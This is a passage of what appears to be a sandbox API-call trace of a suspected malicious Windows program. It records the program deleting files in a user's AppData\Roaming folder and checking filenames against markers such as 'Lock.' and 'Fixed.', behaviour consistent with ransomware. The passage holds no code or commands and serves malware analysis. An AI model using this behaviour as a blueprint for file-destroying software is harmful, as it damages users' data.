lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0198.761] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/f_H3Kw_rw4T-WXKpM.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a", lpFilePart=0x8bedfc*="f_H3Kw_rw4T-WXKpM.m4a") returned 0x43 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0198.761] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f_h3kw_rw4t-wxkpm.m4a")) returned 0x2020 [0198.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cb33fd0, ftCreationTime.dwHighDateTime=0x1d4c574, ftLastAccessTime.dwLowDateTime=0xaeeadad0, ftLastAccessTime.dwHighDateTime=0x1d4d1e5, ftLastWriteTime.dwLowDateTime=0xaeeadad0, ftLastWriteTime.dwHighDateTime=0x1d4d1e5, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0xa9b, dwReserved1=0x4, cFileName="f_H3Kw_rw4T-WXKpM.m4a", cAlternateFileName="F_H3KW~1.M4A")) returned 0xaa58e0 [0198.761] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f_h3kw_rw4t-wxkpm.m4a")) returned 1 [0198.762] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cb33fd0, ftCreationTime.dwHighDateTime=0x1d4c574, ftLastAccessTime.dwLowDateTime=0xaeeadad0, ftLastAccessTime.dwHighDateTime=0x1d4d1e5, ftLastWriteTime.dwLowDateTime=0xaeeadad0, ftLastWriteTime.dwHighDateTime=0x1d4d1e5, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0xa9b, dwReserved1=0x4, cFileName="f_H3Kw_rw4T-WXKpM.m4a", cAlternateFileName="F_H3KW~1.M4A")) returned 0 [0198.762] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0198.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.763] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0198.763] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.763] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0198.765] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/f_H3Kw_rw4T-WXKpM.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a", lpFilePart=0x8bf658*="f_H3Kw_rw4T-WXKpM.m4a") returned 0x43 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0198.765] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f_H3Kw_rw4T-WXKpM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f_h3kw_rw4t-wxkpm.m4a")) returned 0xffffffff [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.766] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0198.766] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.766] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gFulebPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FulebPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ulebPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lebPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pw7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZ.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.767] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gFulebPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FulebPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ulebPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lebPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pw7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZ.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.768] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0198.768] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0198.768] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.768] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.769] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0198.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.769] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/gFulebPw7UZ.flv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd3f190, ftCreationTime.dwHighDateTime=0x1d4ce53, ftLastAccessTime.dwLowDateTime=0x58527c20, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x58527c20, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x126b3, dwReserved0=0xa0a0039, dwReserved1=0x14877, cFileName="gFulebPw7UZ.flv", cAlternateFileName="GFULEB~1.FLV")) returned 0xaa58e0 [0198.770] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.770] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 